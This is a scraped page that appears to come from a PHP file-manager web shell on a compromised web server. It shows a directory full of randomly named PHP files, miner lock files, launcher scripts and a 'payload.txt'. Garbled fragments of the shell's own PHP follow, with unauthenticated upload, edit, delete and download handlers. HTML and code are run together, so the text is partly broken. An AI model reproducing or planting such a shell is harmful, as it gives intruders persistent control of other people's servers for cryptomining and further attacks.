File Manager
Files in the directory:
.cpuz.lock
.miner.lock
.miner_global.lock
.mo-data
.system-cache
.tg_sent
.well-known
.wp-temp
1.php
2lVolXXEhi.php
2x432ypmiz.php
3hEqG72goy.php
3mSEpP6VIC.php
8IfeQl94wM.php
EEEfFASTTc.php
FYlZAjHCJK.php
FmOGpeV0DN.php
GilY6RYYEN.php
Jyi1kMmdR6.php
KSB7IxkEHR.php
KoiYDfSwmC.php
NONAME_E.L.V
RpJKATL2eD.php
ZbZUDuV1li.php
acphy.php
b3f36GgqE6.php
bfkch.php
c9NvS4Mcxk.php
class.php
debug.log
default-config.json
dsy7x4P69Z.php
e8dXYw87RY.php
edUM5QkpFX.php
elv-v1.php
fazemrx1949_3INrTabz.php
fazemrx1949_6ofLF0c6.php
fazemrx1949_Eg6uJOqH.php
ftp_agent_probe_1775988981353.txt
ftp_agent_probe_1775993225088.txt
ftp_agent_probe_1776010136609.txt
ftp_agent_probe_1776013451626.txt
functions.php
google089df9a4579895bc.html
hAFGmIoRMm.php
i2I1MV1643.php
iU8nUnnh8L.php
knjidHu3VO.php
launcher.log
launcher.py
log.txt
output.log
payload.txt
ppp.php
prom.php
promo.php
pros.php
pu9.php
qF34a9c70O.php
rcc9.php
robots.txt
roxpf.php
run-launcher.php
sslauncher.py
sslauncher.sh
teknisi-1.php
test-page-template.php
test.php
tl4eCHbNH2.php
txbzp.php
tyasd.php
uAUSDSdrZ9.php
uZrzalpKEq.php
uploader2.php
uploads
wp-confuser.php
wp-content
xl9.php
xpbwy.php
×HXNONAME_DATA×
Upload a File
Upload
Edit File: fazemrx1949_Eg6uJOqH.php
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?>
Login
File Manager
Files in the directory:
" . $file . ""; } } ?>
Upload a File
Upload
Edit File:
Save
Download
Delete
Save
Download
Delete